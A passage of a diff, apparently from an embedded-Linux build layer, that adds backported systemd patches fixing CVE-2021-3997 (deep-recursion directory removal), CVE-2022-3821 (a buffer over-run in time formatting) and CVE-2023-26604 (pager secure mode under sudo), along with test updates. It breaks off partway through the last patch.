32+ r = rm_rf_children(fd, flags, NULL);
33+
34+ if (FLAGS_SET(flags, REMOVE_ROOT)) {
35+ q = rmdir(path);
36+ if (q < 0)
37+ q = -errno;
38+ }
39+ } else {
40 if (FLAGS_SET(flags, REMOVE_MISSING_OK) && errno == ENOENT)
41 return 0;
42
43 if (!IN_SET(errno, ENOTDIR, ELOOP))
44 return -errno;
45
46- if (FLAGS_SET(flags, REMOVE_ONLY_DIRECTORIES))
47+ if (FLAGS_SET(flags, REMOVE_ONLY_DIRECTORIES) || !FLAGS_SET(flags, REMOVE_ROOT))
48 return 0;
49
50- if (FLAGS_SET(flags, REMOVE_ROOT)) {
51-
52- if (!FLAGS_SET(flags, REMOVE_PHYSICAL)) {
53- struct statfs s;
54-
55- if (statfs(path, &s) < 0)
56- return -errno;
57- if (is_physical_fs(&s))
58- return log_error_errno(SYNTHETIC_ERRNO(EPERM),
59- "Attempted to remove files from a disk file system under \"%s\", refusing.",
60- path);
61- }
62-
63- if (unlink(path) < 0) {
64- if (FLAGS_SET(flags, REMOVE_MISSING_OK) && errno == ENOENT)
65- return 0;
66+ if (!FLAGS_SET(flags, REMOVE_PHYSICAL)) {
67+ struct statfs s;
68
69+ if (statfs(path, &s) < 0)
70 return -errno;
71- }
72+ if (is_physical_fs(&s))
73+ return log_error_errno(SYNTHETIC_ERRNO(EPERM),
74+ "Attempted to remove files from a disk file system under \"%s\", refusing.",
75+ path);
76 }
77
78- return 0;
79+ r = 0;
80+ q = unlink(path);
81+ if (q < 0)
82+ q = -errno;
83 }
84
85- r = rm_rf_children(fd, flags, NULL);
86-
87- if (FLAGS_SET(flags, REMOVE_ROOT) &&
88- rmdir(path) < 0 &&
89- r >= 0 &&
90- (!FLAGS_SET(flags, REMOVE_MISSING_OK) || errno != ENOENT))
91- r = -errno;
92-
93- return r;
94+ if (r < 0)
95+ return r;
96+ if (q < 0 && (q != -ENOENT || !FLAGS_SET(flags, REMOVE_MISSING_OK)))
97+ return q;
98+ return 0;
99 }
100
101 int rm_rf_child(int fd, const char *name, RemoveFlags flags) {
diff --git a/meta/recipes-core/systemd/systemd/CVE-2021-3997-3.patch b/meta/recipes-core/systemd/systemd/CVE-2021-3997-3.patch
new file mode 100644
index 0000000000..c96b8d9a6e
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/CVE-2021-3997-3.patch
@@ -0,0 +1,266 @@
1Backport of the following upstream commit:
2From bef8e8e577368697b2e6f85183b1dbc99e0e520f Mon Sep 17 00:00:00 2001
3From: =?UTF-8?q?Zbigniew=20J=C4=99drzejewski-Szmek?= <zbyszek@in.waw.pl>
4Date: Tue, 30 Nov 2021 22:29:05 +0100
5Subject: [PATCH 3/3] shared/rm-rf: loop over nested directories instead of
6 instead of recursing
7
8To remove directory structures, we need to remove the innermost items first,
9and then recursively remove higher-level directories. We would recursively
10descend into directories and invoke rm_rf_children and rm_rm_children_inner.
11This is problematic when too many directories are nested.
12
13Instead, let's create a "TODO" queue. In the the queue, for each level we
14hold the DIR* object we were working on, and the name of the directory. This
15allows us to leave a partially-processed directory, and restart the removal
16loop one level down. When done with the inner directory, we use the name to
17unlinkat() it from the parent, and proceed with the removal of other items.
18
19Because the nesting is increased by one level, it is best to view this patch
20with -b/--ignore-space-change.
21
22This fixes CVE-2021-3997, https://bugzilla.redhat.com/show_bug.cgi?id=2024639.
23The issue was reported and patches reviewed by Qualys Team.
24Mauro Matteo Cascella and Riccardo Schirone from Red Hat handled the disclosure.
25
26CVE: CVE-2021-3997
27Upstream-Status: Backport [http://archive.ubuntu.com/ubuntu/pool/main/s/systemd/systemd_245.4-4ubuntu3.15.debian.tar.xz]
28Signed-off-by: Purushottam Choudhary <Purushottam.Choudhary@kpit.com>
29---
30 src/basic/rm-rf.c | 161 +++++++++++++++++++++++++++++++--------------
31 1 file changed, 113 insertions(+), 48 deletions(-)
32
33--- a/src/basic/rm-rf.c
34+++ b/src/basic/rm-rf.c
35@@ -26,12 +26,13 @@
36 return !is_temporary_fs(sfs) && !is_cgroup_fs(sfs);
37 }
38
39-static int rm_rf_children_inner(
40+static int rm_rf_inner_child(
41 int fd,
42 const char *fname,
43 int is_dir,
44 RemoveFlags flags,
45- const struct stat *root_dev) {
46+ const struct stat *root_dev,
47+ bool allow_recursion) {
48
49 struct stat st;
50 int r, q = 0;
51@@ -49,9 +50,7 @@
52 }
53
54 if (is_dir) {
55- _cleanup_close_ int subdir_fd = -1;
56-
57- /* if root_dev is set, remove subdirectories only if device is same */
58+ /* If root_dev is set, remove subdirectories only if device is same */
59 if (root_dev && st.st_dev != root_dev->st_dev)
60 return 0;
61
62@@ -63,7 +62,6 @@
63 return 0;
64
65 if ((flags & REMOVE_SUBVOLUME) && st.st_ino == 256) {
66-
67 /* This could be a subvolume, try to remove it */
68
69 r = btrfs_subvol_remove_fd(fd, fname, BTRFS_REMOVE_RECURSIVE|BTRFS_REMOVE_QUOTA);
70@@ -77,13 +75,16 @@
71 return 1;
72 }
73
74- subdir_fd = openat(fd, fname, O_RDONLY|O_NONBLOCK|O_DIRECTORY|O_CLOEXEC|O_NOFOLLOW|O_NOATIME);
75+ if (!allow_recursion)
76+ return -EISDIR;
77+
78+ int subdir_fd = openat(fd, fname, O_RDONLY|O_NONBLOCK|O_DIRECTORY|O_CLOEXEC|O_NOFOLLOW|O_NOATIME);
79 if (subdir_fd < 0)
80 return -errno;
81
82 /* We pass REMOVE_PHYSICAL here, to avoid doing the fstatfs() to check the file system type
83 * again for each directory */
84- q = rm_rf_children(TAKE_FD(subdir_fd), flags | REMOVE_PHYSICAL, root_dev);
85+ q = rm_rf_children(subdir_fd, flags | REMOVE_PHYSICAL, root_dev);
86
87 } else if (flags & REMOVE_ONLY_DIRECTORIES)
88 return 0;
89@@ -96,64 +97,128 @@
90 return 1;
91 }
92
93+typedef struct TodoEntry {
94+ DIR *dir; /* A directory that we were operating on. */
95+ char *dirname; /* The filename of that directory itself. */
96+} TodoEntry;
97+
98+static void free_todo_entries(TodoEntry **todos) {
99+ for (TodoEntry *x = *todos; x && x->dir; x++) {
100+ closedir(x->dir);
101+ free(x->dirname);
102+ }
103+
104+ freep(todos);
105+}
106+
107 int rm_rf_children(
108 int fd,
109 RemoveFlags flags,
110 const struct stat *root_dev) {
111
112- _cleanup_closedir_ DIR *d = NULL;
113- struct dirent *de;
114+ _cleanup_(free_todo_entries) TodoEntry *todos = NULL;
115+ size_t n_todo = 0, allocated = 0;
116+ _cleanup_free_ char *dirname = NULL; /* Set when we are recursing and want to delete ourselves */
117 int ret = 0, r;
118
119- assert(fd >= 0);
120+ /* Return the first error we run into, but nevertheless try to go on.
121+ * The passed fd is closed in all cases, including on failure. */
122
123- /* This returns the first error we run into, but nevertheless tries to go on. This closes the passed
124- * fd, in all cases, including on failure. */
125+ for (;;) { /* This loop corresponds to the directory nesting level. */
126+ _cleanup_closedir_ DIR *d = NULL;
127+ struct dirent *de;
128+
129+ if (n_todo > 0) {
130+ /* We know that we are in recursion here, because n_todo is set.
131+ * We need to remove the inner directory we were operating on. */
132+ assert(dirname);
133+ r = unlinkat(dirfd(todos[n_todo-1].dir), dirname, AT_REMOVEDIR);
134+ if (r < 0 && r != -ENOENT && ret == 0)
135+ ret = r;
136+ dirname = mfree(dirname);
137+
138+ /* And now let's back out one level up */
139+ n_todo --;
140+ d = TAKE_PTR(todos[n_todo].dir);
141+ dirname = TAKE_PTR(todos[n_todo].dirname);
142+
143+ assert(d);
144+ fd = dirfd(d); /* Retrieve the file descriptor from the DIR object */
145+ assert(fd >= 0);
146+ } else {
147+ next_fd:
148+ assert(fd >= 0);
149+ d = fdopendir(fd);
150+ if (!d) {
151+ safe_close(fd);
152+ return -errno;
153+ }
154+ fd = dirfd(d); /* We donated the fd to fdopendir(). Let's make sure we sure we have
155+ * the right descriptor even if it were to internally invalidate the
156+ * one we passed. */
157+
158+ if (!(flags & REMOVE_PHYSICAL)) {
159+ struct statfs sfs;
160+
161+ if (fstatfs(fd, &sfs) < 0)
162+ return -errno;
163+
164+ if (is_physical_fs(&sfs)) {
165+ /* We refuse to clean physical file systems with this call, unless
166+ * explicitly requested. This is extra paranoia just to be sure we
167+ * never ever remove non-state data. */
168+
169+ _cleanup_free_ char *path = NULL;
170+
171+ (void) fd_get_path(fd, &path);
172+ return log_error_errno(SYNTHETIC_ERRNO(EPERM),
173+ "Attempted to remove disk file system under \"%s\", and we can't allow that.",
174+ strna(path));
175+ }
176+ }
177+ }
178
179- d = fdopendir(fd);
180- if (!d) {
181- safe_close(fd);
182- return -errno;
183- }
184+ FOREACH_DIRENT_ALL(de, d, return -errno) {
185+ int is_dir;
186
187- if (!(flags & REMOVE_PHYSICAL)) {
188- struct statfs sfs;
189+ if (dot_or_dot_dot(de->d_name))
190+ continue;
191
192- if (fstatfs(dirfd(d), &sfs) < 0)
193- return -errno;
194- }
195+ is_dir = de->d_type == DT_UNKNOWN ? -1 : de->d_type == DT_DIR;
196
197- if (is_physical_fs(&sfs)) {
198- /* We refuse to clean physical file systems with this call, unless explicitly
199- * requested. This is extra paranoia just to be sure we never ever remove non-state
200- * data. */
201-
202- _cleanup_free_ char *path = NULL;
203-
204- (void) fd_get_path(fd, &path);
205- return log_error_errno(SYNTHETIC_ERRNO(EPERM),
206- "Attempted to remove disk file system under \"%s\", and we can't allow that.",
207- strna(path));
208- }
209- }
210+ r = rm_rf_inner_child(fd, de->d_name, is_dir, flags, root_dev, false);
211+ if (r == -EISDIR) {
212+ /* Push the current working state onto the todo list */
213
214- FOREACH_DIRENT_ALL(de, d, return -errno) {
215- int is_dir;
216+ if (!GREEDY_REALLOC0(todos, allocated, n_todo + 2))
217+ return log_oom();
218
219- if (dot_or_dot_dot(de->d_name))
220- continue;
221+ _cleanup_free_ char *newdirname = strdup(de->d_name);
222+ if (!newdirname)
223+ return log_oom();
224
225- is_dir =
226- de->d_type == DT_UNKNOWN ? -1 :
227- de->d_type == DT_DIR;
228-
229- r = rm_rf_children_inner(dirfd(d), de->d_name, is_dir, flags, root_dev);
230- if (r < 0 && r != -ENOENT && ret == 0)
231- ret = r;
232- }
233+ int newfd = openat(fd, de->d_name,
234+ O_RDONLY|O_NONBLOCK|O_DIRECTORY|O_CLOEXEC|O_NOFOLLOW|O_NOATIME);
235+ if (newfd >= 0) {
236+ todos[n_todo++] = (TodoEntry) { TAKE_PTR(d), TAKE_PTR(dirname) };
237+ fd = newfd;
238+ dirname = TAKE_PTR(newdirname);
239+
240+ goto next_fd;
241
242- if (FLAGS_SET(flags, REMOVE_SYNCFS) && syncfs(dirfd(d)) < 0 && ret >= 0)
243- ret = -errno;
244+ } else if (errno != -ENOENT && ret == 0)
245+ ret = -errno;
246+
247+ } else if (r < 0 && r != -ENOENT && ret == 0)
248+ ret = r;
249+ }
250+
251+ if (FLAGS_SET(flags, REMOVE_SYNCFS) && syncfs(fd) < 0 && ret >= 0)
252+ ret = -errno;
253+
254+ if (n_todo == 0)
255+ break;
256+ }
257
258 return ret;
259 }
260@@ -250,5 +315,5 @@
261 if (FLAGS_SET(flags, REMOVE_ONLY_DIRECTORIES|REMOVE_SUBVOLUME))
262 return -EINVAL;
263
264- return rm_rf_children_inner(fd, name, -1, flags, NULL);
265+ return rm_rf_inner_child(fd, name, -1, flags, NULL, true);
266 }
diff --git a/meta/recipes-core/systemd/systemd/CVE-2022-3821.patch b/meta/recipes-core/systemd/systemd/CVE-2022-3821.patch
new file mode 100644
index 0000000000..f9c6704cfc
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/CVE-2022-3821.patch
@@ -0,0 +1,47 @@
1From 9102c625a673a3246d7e73d8737f3494446bad4e Mon Sep 17 00:00:00 2001
2From: Yu Watanabe <watanabe.yu+github@gmail.com>
3Date: Thu, 7 Jul 2022 18:27:02 +0900
4Subject: [PATCH] time-util: fix buffer-over-run
5
6Fixes #23928.
7
8CVE: CVE-2022-3821
9Upstream-Status: Backport [https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e.patch]
10Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
11Comment: Both the hunks refreshed to backport
12
13---
14 src/basic/time-util.c | 2 +-
15 src/test/test-time-util.c | 5 +++++
16 2 files changed, 6 insertions(+), 1 deletion(-)
17
18diff --git a/src/basic/time-util.c b/src/basic/time-util.c
19index abbc4ad5cd70..26d59de12348 100644
20--- a/src/basic/time-util.c
21+++ b/src/basic/time-util.c
22@@ -514,7 +514,7 @@ char *format_timespan(char *buf, size_t
23 t = b;
24 }
25
26- n = MIN((size_t) k, l);
27+ n = MIN((size_t) k, l-1);
28
29 l -= n;
30 p += n;
31diff --git a/src/test/test-time-util.c b/src/test/test-time-util.c
32index e8e4e2a67bb1..58c5fa9be40c 100644
33--- a/src/test/test-time-util.c
34+++ b/src/test/test-time-util.c
35@@ -501,6 +501,12 @@ int main(int argc, char *argv[]) {
36 test_format_timespan(1);
37 test_format_timespan(USEC_PER_MSEC);
38 test_format_timespan(USEC_PER_SEC);
39+
40+ /* See issue #23928. */
41+ _cleanup_free_ char *buf;
42+ assert_se(buf = new(char, 5));
43+ assert_se(buf == format_timespan(buf, 5, 100005, 1000));
44+
45 test_timezone_is_valid();
46 test_get_timezones();
47 test_usec_add();
diff --git a/meta/recipes-core/systemd/systemd/CVE-2023-26604-1.patch b/meta/recipes-core/systemd/systemd/CVE-2023-26604-1.patch
new file mode 100644
index 0000000000..39f9480cf8
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/CVE-2023-26604-1.patch
@@ -0,0 +1,115 @@
1From 612ebf6c913dd0e4197c44909cb3157f5c51a2f0 Mon Sep 17 00:00:00 2001
2From: Lennart Poettering <lennart@poettering.net>
3Date: Mon, 31 Aug 2020 19:37:13 +0200
4Subject: [PATCH] pager: set $LESSSECURE whenver we invoke a pager
5
6Some extra safety when invoked via "sudo". With this we address a
7genuine design flaw of sudo, and we shouldn't need to deal with this.
8But it's still a good idea to disable this surface given how exotic it
9is.
10
11Prompted by #5666
12
13CVE: CVE-2023-26604
14Upstream-Status: Backport [https://github.com/systemd/systemd/pull/17270/commits/612ebf6c913dd0e4197c44909cb3157f5c51a2f0]
15Comments: Hunk not refreshed
16Signed-off-by: rajmohan r <rajmohan.r@kpit.com>
17---
18 man/less-variables.xml | 9 +++++++++
19 man/systemctl.xml | 1 +
20 man/systemd.xml | 1 +
21 src/shared/pager.c | 23 +++++++++++++++++++++--
22 4 files changed, 32 insertions(+), 2 deletions(-)
23
24diff --git a/man/less-variables.xml b/man/less-variables.xml
25index 08e513c99f8e..c52511ca8e18 100644
26--- a/man/less-variables.xml
27+++ b/man/less-variables.xml
28@@ -64,6 +64,15 @@
29 the invoking terminal is determined to be UTF-8 compatible).</para></listitem>
30 </varlistentry>
31
32+ <varlistentry id='lesssecure'>
33+ <term><varname>$SYSTEMD_LESSSECURE</varname></term>
34+
35+ <listitem><para>Takes a boolean argument. Overrides the <varname>$LESSSECURE</varname> environment
36+ variable when invoking the pager, which controls the "secure" mode of less (which disables commands
37+ such as <literal>|</literal> which allow to easily shell out to external command lines). By default
38+ less secure mode is enabled, with this setting it may be disabled.</para></listitem>
39+ </varlistentry>
40+
41 <varlistentry id='colors'>
42 <term><varname>$SYSTEMD_COLORS</varname></term>
43
44diff --git a/man/systemctl.xml b/man/systemctl.xml
45index 1c5502883700..a3f0c3041a57 100644
46--- a/man/systemctl.xml
47+++ b/man/systemctl.xml
48@@ -2240,6 +2240,7 @@ Jan 12 10:46:45 example.com bluetoothd[8900]: gatt-time-server: Input/output err
49 <xi:include href="less-variables.xml" xpointer="pager"/>
50 <xi:include href="less-variables.xml" xpointer="less"/>
51 <xi:include href="less-variables.xml" xpointer="lesscharset"/>
52+ <xi:include href="less-variables.xml" xpointer="lesssecure"/>
53 <xi:include href="less-variables.xml" xpointer="colors"/>
54 <xi:include href="less-variables.xml" xpointer="urlify"/>
55 </refsect1>
56diff --git a/man/systemd.xml b/man/systemd.xml
57index a9040545c2ab..c92cfef77689 100644
58--- a/man/systemd.xml
59+++ b/man/systemd.xml
60@@ -692,6 +692,7 @@
61 <xi:include href="less-variables.xml" xpointer="pager"/>
62 <xi:include href="less-variables.xml" xpointer="less"/>
63 <xi:include href="less-variables.xml" xpointer="lesscharset"/>
64+ <xi:include href="less-variables.xml" xpointer="lesssecure"/>
65 <xi:include href="less-variables.xml" xpointer="colors"/>
66 <xi:include href="less-variables.xml" xpointer="urlify"/>
67
68diff --git a/src/shared/pager.c b/src/shared/pager.c
69index e03be6d23b2d..9c21881241f5 100644
70--- a/src/shared/pager.c
71+++ b/src/shared/pager.c
72@@ -9,6 +9,7 @@
73 #include <unistd.h>
74
75 #include "copy.h"
76+#include "env-util.h"
77 #include "fd-util.h"
78 #include "fileio.h"
79 #include "io-util.h"
80@@ -152,8 +153,7 @@ int pager_open(PagerFlags flags) {
81 _exit(EXIT_FAILURE);
82 }
83
84- /* Initialize a good charset for less. This is
85- * particularly important if we output UTF-8
86+ /* Initialize a good charset for less. This is particularly important if we output UTF-8
87 * characters. */
88 less_charset = getenv("SYSTEMD_LESSCHARSET");
89 if (!less_charset && is_locale_utf8())
90@@ -164,6 +164,25 @@ int pager_open(PagerFlags flags) {
91 _exit(EXIT_FAILURE);
92 }
93
94+ /* People might invoke us from sudo, don't needlessly allow less to be a way to shell out
95+ * privileged stuff. */
96+ r = getenv_bool("SYSTEMD_LESSSECURE");
97+ if (r == 0) { /* Remove env var if off */
98+ if (unsetenv("LESSSECURE") < 0) {
99+ log_error_errno(errno, "Failed to uset environment variable LESSSECURE: %m");
100+ _exit(EXIT_FAILURE);
101+ }
102+ } else {
103+ /* Set env var otherwise */
104+ if (r < 0)
105+ log_warning_errno(r, "Unable to parse $SYSTEMD_LESSSECURE, ignoring: %m");
106+
107+ if (setenv("LESSSECURE", "1", 1) < 0) {
108+ log_error_errno(errno, "Failed to set environment variable LESSSECURE: %m");
109+ _exit(EXIT_FAILURE);
110+ }
111+ }
112+
113 if (pager_args) {
114 r = loop_write(exe_name_pipe[1], pager_args[0], strlen(pager_args[0]) + 1, false);
115 if (r < 0) {
diff --git a/meta/recipes-core/systemd/systemd/CVE-2023-26604-2.patch b/meta/recipes-core/systemd/systemd/CVE-2023-26604-2.patch
new file mode 100644
index 0000000000..95da7cfad6
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/CVE-2023-26604-2.patch
@@ -0,0 +1,264 @@
1From 1b5b507cd2d1d7a2b053151abb548475ad9c5c3b Mon Sep 17 00:00:00 2001
2From: =?UTF-8?q?Zbigniew=20J=C4=99drzejewski-Szmek?= <zbyszek@in.waw.pl>
3Date: Mon, 12 Oct 2020 18:57:32 +0200
4Subject: [PATCH] test-login: always test sd_pid_get_owner_uid(), modernize
5
6A long time some function only worked when in a session, and the test
7didn't execute them when sd_pid_get_session() failed. Let's always call
8them to increase coverage.
9
10While at it, let's test for ==0 not >=0 where we don't expect the function
11to return anything except 0 or error.
12
13CVE: CVE-2023-26604
14Upstream-Status: Backport [https://github.com/systemd/systemd/pull/17270/commits/1b5b507cd2d1d7a2b053151abb548475ad9c5c3b.patch]
15Comments: Hunk not refreshed
16Signed-off-by: rajmohan r <rajmohan.r@kpit.com>
17---
18 src/libsystemd/sd-login/test-login.c | 131 ++++++++++++++-------------
19 1 file changed, 70 insertions(+), 61 deletions(-)
20
21diff --git a/src/libsystemd/sd-login/test-login.c b/src/libsystemd/sd-login/test-login.c
22index c0c77e04714b..0494fc77ba18 100644
23--- a/src/libsystemd/sd-login/test-login.c
24+++ b/src/libsystemd/sd-login/test-login.c
25@@ -5,21 +5,22 @@
26 #include "sd-login.h"
27
28 #include "alloc-util.h"
29+#include "errno-list.h"
30 #include "fd-util.h"
31 #include "format-util.h"
32 #include "log.h"
33 #include "string-util.h"
34 #include "strv.h"
35 #include "time-util.h"
36-#include "util.h"
37+#include "user-util.h"
38
39 static char* format_uids(char **buf, uid_t* uids, int count) {
40- int pos = 0, k, inc;
41+ int pos = 0, inc;
42 size_t size = (DECIMAL_STR_MAX(uid_t) + 1) * count + 1;
43
44 assert_se(*buf = malloc(size));
45
46- for (k = 0; k < count; k++) {
47+ for (int k = 0; k < count; k++) {
48 sprintf(*buf + pos, "%s"UID_FMT"%n", k > 0 ? " " : "", uids[k], &inc);
49 pos += inc;
50 }
51@@ -30,6 +31,10 @@ static char* format_uids(char **buf, uid_t* uids, int count) {
52 return *buf;
53 }
54
55+static const char *e(int r) {
56+ return r == 0 ? "OK" : errno_to_name(r);
57+}
58+
59 static void test_login(void) {
60 _cleanup_close_pair_ int pair[2] = { -1, -1 };
61 _cleanup_free_ char *pp = NULL, *qq = NULL,
62@@ -39,65 +44,71 @@ static void test_login(void) {
63 *seat = NULL, *session = NULL,
64 *unit = NULL, *user_unit = NULL, *slice = NULL;
65 int r;
66- uid_t u, u2;
67- char *t, **seats, **sessions;
68+ uid_t u, u2 = UID_INVALID;
69+ char *t, **seats = NULL, **sessions = NULL;
70
71 r = sd_pid_get_unit(0, &unit);
72- assert_se(r >= 0 || r == -ENODATA);
73- log_info("sd_pid_get_unit(0, …) → \"%s\"", strna(unit));
74+ log_info("sd_pid_get_unit(0, …) → %s / \"%s\"", e(r), strnull(unit));
75+ assert_se(IN_SET(r, 0, -ENODATA));
76
77 r = sd_pid_get_user_unit(0, &user_unit);
78- assert_se(r >= 0 || r == -ENODATA);
79- log_info("sd_pid_get_user_unit(0, …) → \"%s\"", strna(user_unit));
80+ log_info("sd_pid_get_user_unit(0, …) → %s / \"%s\"", e(r), strnull(user_unit));
81+ assert_se(IN_SET(r, 0, -ENODATA));
82
83 r = sd_pid_get_slice(0, &slice);
84- assert_se(r >= 0 || r == -ENODATA);
85- log_info("sd_pid_get_slice(0, …) → \"%s\"", strna(slice));
86+ log_info("sd_pid_get_slice(0, …) → %s / \"%s\"", e(r), strnull(slice));
87+ assert_se(IN_SET(r, 0, -ENODATA));
88+
89+ r = sd_pid_get_owner_uid(0, &u2);
90+ log_info("sd_pid_get_owner_uid(0, …) → %s / "UID_FMT, e(r), u2);
91+ assert_se(IN_SET(r, 0, -ENODATA));
92
93 r = sd_pid_get_session(0, &session);
94- if (r < 0) {
95- log_warning_errno(r, "sd_pid_get_session(0, …): %m");
96- if (r == -ENODATA)
97- log_info("Seems we are not running in a session, skipping some tests.");
98- } else {
99- log_info("sd_pid_get_session(0, …) → \"%s\"", session);
100-
101- assert_se(sd_pid_get_owner_uid(0, &u2) == 0);
102- log_info("sd_pid_get_owner_uid(0, …) → "UID_FMT, u2);
103-
104- assert_se(sd_pid_get_cgroup(0, &cgroup) == 0);
105- log_info("sd_pid_get_cgroup(0, …) → \"%s\"", cgroup);
106-
107- r = sd_uid_get_display(u2, &display_session);
108- assert_se(r >= 0 || r == -ENODATA);
109- log_info("sd_uid_get_display("UID_FMT", …) → \"%s\"",
110- u2, strnull(display_session));
111-
112- assert_se(socketpair(AF_UNIX, SOCK_STREAM, 0, pair) == 0);
113- sd_peer_get_session(pair[0], &pp);
114- sd_peer_get_session(pair[1], &qq);
115- assert_se(streq_ptr(pp, qq));
116-
117- r = sd_uid_get_sessions(u2, false, &sessions);
118+ log_info("sd_pid_get_session(0, …) → %s / \"%s\"", e(r), strnull(session));
119+
120+ r = sd_pid_get_cgroup(0, &cgroup);
121+ log_info("sd_pid_get_cgroup(0, …) → %s / \"%s\"", e(r), strnull(cgroup));
122+ assert_se(r == 0);
123+
124+ r = sd_uid_get_display(u2, &display_session);
125+ log_info("sd_uid_get_display("UID_FMT", …) → %s / \"%s\"", u2, e(r), strnull(display_session));
126+ if (u2 == UID_INVALID)
127+ assert_se(r == -EINVAL);
128+ else
129+ assert_se(IN_SET(r, 0, -ENODATA));
130+
131+ assert_se(socketpair(AF_UNIX, SOCK_STREAM, 0, pair) == 0);
132+ sd_peer_get_session(pair[0], &pp);
133+ sd_peer_get_session(pair[1], &qq);
134+ assert_se(streq_ptr(pp, qq));
135+
136+ r = sd_uid_get_sessions(u2, false, &sessions);
137+ assert_se(t = strv_join(sessions, " "));
138+ log_info("sd_uid_get_sessions("UID_FMT", …) → %s \"%s\"", u2, e(r), t);
139+ if (u2 == UID_INVALID)
140+ assert_se(r == -EINVAL);
141+ else {
142 assert_se(r >= 0);
143 assert_se(r == (int) strv_length(sessions));
144- assert_se(t = strv_join(sessions, " "));
145- strv_free(sessions);
146- log_info("sd_uid_get_sessions("UID_FMT", …) → [%i] \"%s\"", u2, r, t);
147- free(t);
148+ }
149+ sessions = strv_free(sessions);
150+ free(t);
151
152- assert_se(r == sd_uid_get_sessions(u2, false, NULL));
153+ assert_se(r == sd_uid_get_sessions(u2, false, NULL));
154
155- r = sd_uid_get_seats(u2, false, &seats);
156+ r = sd_uid_get_seats(u2, false, &seats);
157+ assert_se(t = strv_join(seats, " "));
158+ log_info("sd_uid_get_seats("UID_FMT", …) → %s \"%s\"", u2, e(r), t);
159+ if (u2 == UID_INVALID)
160+ assert_se(r == -EINVAL);
161+ else {
162 assert_se(r >= 0);
163 assert_se(r == (int) strv_length(seats));
164- assert_se(t = strv_join(seats, " "));
165- strv_free(seats);
166- log_info("sd_uid_get_seats("UID_FMT", …) → [%i] \"%s\"", u2, r, t);
167- free(t);
168-
169- assert_se(r == sd_uid_get_seats(u2, false, NULL));
170 }
171+ seats = strv_free(seats);
172+ free(t);
173+
174+ assert_se(r == sd_uid_get_seats(u2, false, NULL));
175
176 if (session) {
177 r = sd_session_is_active(session);
178@@ -109,7 +120,7 @@ static void test_login(void) {
179 log_info("sd_session_is_remote(\"%s\") → %s", session, yes_no(r));
180
181 r = sd_session_get_state(session, &state);
182- assert_se(r >= 0);
183+ assert_se(r == 0);
184 log_info("sd_session_get_state(\"%s\") → \"%s\"", session, state);
185
186 assert_se(sd_session_get_uid(session, &u) >= 0);
187@@ -123,16 +134,16 @@ static void test_login(void) {
188 log_info("sd_session_get_class(\"%s\") → \"%s\"", session, class);
189
190 r = sd_session_get_display(session, &display);
191- assert_se(r >= 0 || r == -ENODATA);
192+ assert_se(IN_SET(r, 0, -ENODATA));
193 log_info("sd_session_get_display(\"%s\") → \"%s\"", session, strna(display));
194
195 r = sd_session_get_remote_user(session, &remote_user);
196- assert_se(r >= 0 || r == -ENODATA);
197+ assert_se(IN_SET(r, 0, -ENODATA));
198 log_info("sd_session_get_remote_user(\"%s\") → \"%s\"",
199 session, strna(remote_user));
200
201 r = sd_session_get_remote_host(session, &remote_host);
202- assert_se(r >= 0 || r == -ENODATA);
203+ assert_se(IN_SET(r, 0, -ENODATA));
204 log_info("sd_session_get_remote_host(\"%s\") → \"%s\"",
205 session, strna(remote_host));
206
207@@ -161,7 +172,7 @@ static void test_login(void) {
208 assert_se(r == -ENODATA);
209 }
210
211- assert_se(sd_uid_get_state(u, &state2) >= 0);
212+ assert_se(sd_uid_get_state(u, &state2) == 0);
213 log_info("sd_uid_get_state("UID_FMT", …) → %s", u, state2);
214 }
215
216@@ -173,11 +184,11 @@ static void test_login(void) {
217 assert_se(sd_uid_is_on_seat(u, 0, seat) > 0);
218
219 r = sd_seat_get_active(seat, &session2, &u2);
220- assert_se(r >= 0);
221+ assert_se(r == 0);
222 log_info("sd_seat_get_active(\"%s\", …) → \"%s\", "UID_FMT, seat, session2, u2);
223
224 r = sd_uid_is_on_seat(u, 1, seat);
225- assert_se(r >= 0);
226+ assert_se(IN_SET(r, 0, 1));
227 assert_se(!!r == streq(session, session2));
228
229 r = sd_seat_get_sessions(seat, &sessions, &uids, &n);
230@@ -185,8 +196,8 @@ static void test_login(void) {
231 assert_se(r == (int) strv_length(sessions));
232 assert_se(t = strv_join(sessions, " "));
233 strv_free(sessions);
234- log_info("sd_seat_get_sessions(\"%s\", …) → %i, \"%s\", [%i] {%s}",
235- seat, r, t, n, format_uids(&buf, uids, n));
236+ log_info("sd_seat_get_sessions(\"%s\", …) → %s, \"%s\", [%u] {%s}",
237+ seat, e(r), t, n, format_uids(&buf, uids, n));
238 free(t);
239
240 assert_se(sd_seat_get_sessions(seat, NULL, NULL, NULL) == r);
241@@ -204,7 +215,7 @@ static void test_login(void) {
242
243 r = sd_seat_get_active(NULL, &t, NULL);
244 assert_se(IN_SET(r, 0, -ENODATA));
245- log_info("sd_seat_get_active(NULL, …) (active session on current seat) → %s", strnull(t));
246+ log_info("sd_seat_get_active(NULL, …) (active session on current seat) → %s / \"%s\"", e(r), strnull(t));
247 free(t);
248
249 r = sd_get_sessions(&sessions);
250@@ -244,13 +255,11 @@ static void test_login(void) {
251
252 static void test_monitor(void) {
253 sd_login_monitor *m = NULL;
254- unsigned n;
255 int r;
256
257- r = sd_login_monitor_new("session", &m);
258- assert_se(r >= 0);
259+ assert_se(sd_login_monitor_new("session", &m) == 0);
260
261- for (n = 0; n < 5; n++) {
262+ for (unsigned n = 0; n < 5; n++) {
263 struct pollfd pollfd = {};
264 usec_t timeout, nw;
diff --git a/meta/recipes-core/systemd/systemd/CVE-2023-26604-3.patch b/meta/recipes-core/systemd/systemd/CVE-2023-26604-3.patch
new file mode 100644
index 0000000000..f02f62b772
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/CVE-2023-26604-3.patch
@@ -0,0 +1,182 @@
1From 0a42426d797406b4b01a0d9c13bb759c2629d108 Mon Sep 17 00:00:00 2001
2From: =?UTF-8?q?Zbigniew=20J=C4=99drzejewski-Szmek?= <zbyszek@in.waw.pl>
3Date: Wed, 7 Oct 2020 11:15:05 +0200
4Subject: [PATCH] pager: make pager secure when under euid is changed or
5 explicitly requested
6
7The variable is renamed to SYSTEMD_PAGERSECURE (because it's not just about
8less now), and we automatically enable secure mode in certain cases, but not
9otherwise.
10
11This approach is more nuanced, but should provide a better experience for
